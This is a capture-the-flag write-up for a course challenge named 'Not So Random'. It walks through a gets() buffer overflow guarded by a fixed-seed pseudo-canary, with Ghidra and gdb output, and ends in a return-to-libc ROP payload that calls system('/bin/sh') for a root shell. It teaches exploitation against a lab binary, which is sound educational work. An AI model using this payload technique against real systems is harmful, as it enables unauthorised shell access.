---
title:  "Writeup: Not So Random"
date:   2019-05-03 16:00:00
categories: writeup
author: Matt McDonald
layout: post
---

Not So Random is an interesting reverse engineering binary that revolves around
a function featuring something similar to a stack canary, but that is - as we
will see - not actually random. To help make this challenge easier, we will make
use of _Ghidra_, a C decompiler program published by the NSA. Download the binary
off of the course server, create a new project in Ghidra, and import the file.

At first run, Ghidra will let you know that _"random has yet to be analyzed"_.
Click OK to analyze the binary, and then wait a few seconds as the program
converts from assembly back to its best guess of what the C code looked like.
In the left pane are a few options - one of them is "Functions". Expand this
folder, and then select the _main_ function to take a look at what happens
when we run the program.

```
undefined8 main(void)

{
  puts("Here are some useful addresses:\n");
  printf("puts: %p\n",puts);
  printf("fflush %p\n",fflush);
  printf("read: %p\n",read);
  printf("write: %p\n",write);
  putchar(10);
  vuln();
  return 0;
}
```

As you can tell from the "undefined8" and the "void", Ghidra isn't perfect,
but it does a pretty good job overall of giving us readable c code. Clearly
the main function here doesn't do much, other than print some tables of 
stdlib functions and call _vuln_. Let's take a look at what the vuln function
does:

```
ulong vuln(void)

{
  uint uVar1;
  char local_a8 [152];
  uint local_10;
  uint local_c;
  
  local_c = rand();
  srand(1);
  puts("Enter a string:");
  gets(local_a8);
  local_10 = local_c;
  puts("Thanks! Exiting now...");
  printf("key = %d",(ulong)local_10);
  uVar1 = rand();
  if (uVar1 != local_10) {
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  return (ulong)uVar1;
}
```

This function is slightly less readable than main, but we can still make our
way through it. Ignoring the poorly names variables for now, we can see that
the program starts by setting local_c to a random number, and then sets the
random seed to 1. Next, it calls gets to fill our buffer of size 152. The
use of gets here seems to indicate that a buffer overflow would be a solid
way to gain access to the flag, but there's something in the way.

After taking input, the program sets local_10 to be local_c, and then sets 
uVar1 to a new random value. Then, it compares uVar1 to local_10, and if 
the values are not equal, the program exits without returning! In order to 
take advantage of the buffer overflow, we'll have to find a way to make it
past this if statement to the return. 

So how do we make uVar1 equal local_10? uVar1 is (conveniently) defined
_before_ the buffer, meaning we don't have access to change the value of it
even with a buffer overflow. local_10, however, is located after the buffer,
meaning with a carefully crafted exploit string, we can change it's value to
whatever we want. But what do we change it to?

At first glance, it seems like the value we need to set local_10 to is random,
meaning it would be nearly impossible. However, after closer inspection, we can
see that while local_c is _actually_ random, the seed is set to 1 every time
before uVar1 is defined, meaning uVar1 will be the same "random" number every
time! Let's load up the executable in gdb and try to figure out what value we
need.

In order to figure out what our "random" value is, we're going to want to run
the program until right after the call to rand(), and then examine the relevant
part of memory to find our value. We begin by disassembling the vuln function:

```
(gdb) disas vuln
Dump of assembler code for function vuln:
   0x00000000004007b6 <+0>:     push   %rbp
   0x00000000004007b7 <+1>:     mov    %rsp,%rbp
   0x00000000004007ba <+4>:     sub    $0xa0,%rsp
   0x00000000004007c1 <+11>:    callq  0x4006a0 <rand@plt>
   0x00000000004007c6 <+16>:    mov    %eax,-0x4(%rbp)
   0x00000000004007c9 <+19>:    mov    $0x1,%edi
   0x00000000004007ce <+24>:    callq  0x400660 <srand@plt>
   0x00000000004007d3 <+29>:    mov    $0x400938,%edi
   0x00000000004007d8 <+34>:    callq  0x400610 <puts@plt>
   0x00000000004007dd <+39>:    lea    -0xa0(%rbp),%rax
   0x00000000004007e4 <+46>:    mov    %rax,%rdi
   0x00000000004007e7 <+49>:    mov    $0x0,%eax
   0x00000000004007ec <+54>:    callq  0x400670 <gets@plt>
   0x00000000004007f1 <+59>:    mov    -0x4(%rbp),%eax
   0x00000000004007f4 <+62>:    mov    %eax,-0x8(%rbp)
   0x00000000004007f7 <+65>:    mov    $0x400948,%edi
   0x00000000004007fc <+70>:    callq  0x400610 <puts@plt>
   0x0000000000400801 <+75>:    mov    -0x8(%rbp),%eax
   0x0000000000400804 <+78>:    mov    %eax,%esi
   0x0000000000400806 <+80>:    mov    $0x40095f,%edi
   0x000000000040080b <+85>:    mov    $0x0,%eax
   0x0000000000400810 <+90>:    callq  0x400630 <printf@plt>
   0x0000000000400815 <+95>:    callq  0x4006a0 <rand@plt>
   0x000000000040081a <+100>:   cmp    -0x8(%rbp),%eax
   0x000000000040081d <+103>:   je     0x400829 <vuln+115>
   0x000000000040081f <+105>:   mov    $0x0,%edi
   0x0000000000400824 <+110>:   callq  0x400690 <exit@plt>
   0x0000000000400829 <+115>:   nop
   0x000000000040082a <+116>:   leaveq
   0x000000000040082b <+117>:   retq
End of assembler dump.
```

We can see at vuln+95, we make the second call to rand(). We can then see on
the line after, we are comparing the value in the register %eax to the value
at %rbp-0x8. We know that the register %eax is used to store the return
value of the function just called, so this must be our random value! Now we
just need to run the program to this point and find the actual value. To do
this, we'll put a breakpoint right after the call to rand(), and then check
the registers:

```
(gdb) b *vuln+100
Breakpoint 1 at 0x40081a
(gdb) r
Here are some useful addresses:

puts: 0x400610
fflush 0x400680
read: 0x400640
write: 0x400620

Enter a string:
aaaaa
Thanks! Exiting now...

Breakpoint 1, 0x000000000040081a in vuln ()
(gdb) info registers
rax            0x12345678       
```

Perfect! Lets write this "random" value down, as we'll need it in a minute to
add to our exploit string. Just to be sure that we really get the same number
every time, we can repeat the process and see the same value in %rax again.

Now to build the exploit string. Our buffer is 152 bytes long, and local_10
begins right after it, so it seems like we just need to fill the buffer with
152 bytes of garbage and then put our random value on the stack to overwrite
local_10. Then, to test if this works, we're going to print a bunch more garbage
after. This way, we'll know if we pass the if statement because we'll get a 
segmentation fault from overriding the return address. Let's give it a try:

```
(gdb) r <<< $(python -c 'print "a"*152 + "\x78\x56\x34\x12" + "b"*50')
Here are some useful addresses:

puts: 0x400610
fflush 0x400680
read: 0x400640
write: 0x400620

Enter a string:
Thanks! Exiting now...
key = 1650614882[Inferior 1 (process 504) exited normally]
```

That doesn't seem to have worked... but what went wrong? We can see the "key"
printed is 1650614882, which, after converting to hex, we realize is equal to
0x62626262. This means that we need to add more padding before putting the
random number on that stack. Lets try adding 4 more bytes:

```
(gdb) r <<< $(python -c 'print "a"*156 + "\x78\x56\x34\x12" + "b"*50')
Here are some useful addresses:

puts: 0x400610
fflush 0x400680
read: 0x400640
write: 0x400620

Enter a string:
Thanks! Exiting now...

Program received signal SIGSEGV, Segmentation fault.
0x000000000040082b in vuln ()
```

Perfect! We got the segmentation fault we were expecting, meaning we can now
mess with the return address to perform an exploit. In this case, it seems like
since we were dealing with a 4-byte large integer in a 64-bit system, the system
left an extra 4 byte gap to keep everything aligned. It's probably safe to assume
that the system did the same thing with local_c, defined after local_10, so lets
change our exploit string one more time just to be sure we know exactly where the
return address starts:

```
(gdb) r <<< $(python -c 'print "a"*156 + "\x78\x56\x34\x12" + "b"*8 + "c"*8')
Here are some useful addresses:

puts: 0x400610
fflush 0x400680
read: 0x400640
write: 0x400620

Enter a string:
Thanks! Exiting now...

Program received signal SIGSEGV, Segmentation fault.
0x000000000040082b in vuln ()

(gdb) info frame
Stack level 0, frame at 0x7ffffffede28:
 rip = 0x40082b in vuln; saved rip = 0x6363636363636363
```

By running ```info frame```, we can see that our "saved rip", or where we'll be
returning to, was correctly filled with 8 c's. Now to begin the actual exploit.
Personally, I prefer return to libc attacks like the one performed in stack5, 
so that's what I'll be using.

To perform a return to libc attack, we need to return to the system() function
in libc, with the first argument set to the address of /bin/sh. Lets start by
finding these two addresses in gdb:

```
(gdb) p system
$1 = {int (const char *)} 0x7fffff000000 <__libc_system>
(gdb) find &system,0xffffffffffffffff,"/bin/sh"
0x7fffff111111
warning: Unable to access 16000 bytes of target memory at 0x7fffff1e6b22, halting search.
1 pattern found.
```

Now that we have these two addresses, we just need to figure out how to properly
call the function. In a 32-bit system, this is as simple as just placing the address
of /bin/sh on the stack. However, in a 64-bit binary like this, we need to get our
argument into the %rdi register, as this is standard calling convention. To accomplish
this, we'll need to add one more part to our exploit: a ROP gadget.

In our case, we need a relatively simple ROP gadget. Ideally, we can find one that simply
takes the first value on the stack, puts it into %rdi for us with a ```pop``` instruction,
and then returns to the value after it. To find this, we'll make use of the _ROPGadget_
tool, included in the EpicTreasure Docker image or available on GitHub for separate
download.

This tool is relatively simple, and will make our job very easy:

```
> python3 ROPgadget.py --binary ../problems/Not\ So\ Random/random | grep "pop rdi"
0x0000000000abcdef : pop rdi ; ret
```

After running for a minute, ROPgadget returns and tells us that the exact gadget we need
does exist, at address 0xabcdef. Convenient! To use the ROP gadget, we just need to return
to it like we would any other function by placing it's address at the top of the stack.
Let's review the order of all of the items in our exploit string before we begin the final
construction:

First, we have 156 bytes of garbage to fill the buffer and the extra space.
Then, we have the 4 byes of our "random" value, so that we can bypass the pseudo-canary.
Next, we have 8 bytes of garbage, to fill the space on the stack left for local_c.
After these three, we begin with the actual exploit.
We'll first want to return to our ROP gadget, so we'll put the address of that next.
When our gadget calls ```pop```, it will take the first value on the stack and put it
into the specified register. Since the value we want to load into %rdi is the address of
/bin/sh, that will be the fifth thing in our exploit.
Lastly, our gadget will return. We want it to return to the system function, thereby calling
```system("/bin/sh")``` and hopefully launching a shell with elevated permissions for us!

Let's put this all together and give it a try. To run the program, we'll need to use the 
"cat" trick that we've seen before - otherwise our shell won't actually print the output 
of our root shell, and we couldn't see the flag.

```
(python -c 'print "a"*156 + 
                  "\x78\x56\x34\x12" + 
                  "b"*8 + 
                  "\xef\xcd\xab\x00\x00\x00\x00\x00" + 
                  "\x11\x11\x11\xff\xff\x7f\x00\x00" + 
                  "\x00\x00\x00\xff\xff\x7f\x00\x00"'; cat) | ./random
```

Running the program like this should grant access to a root shell!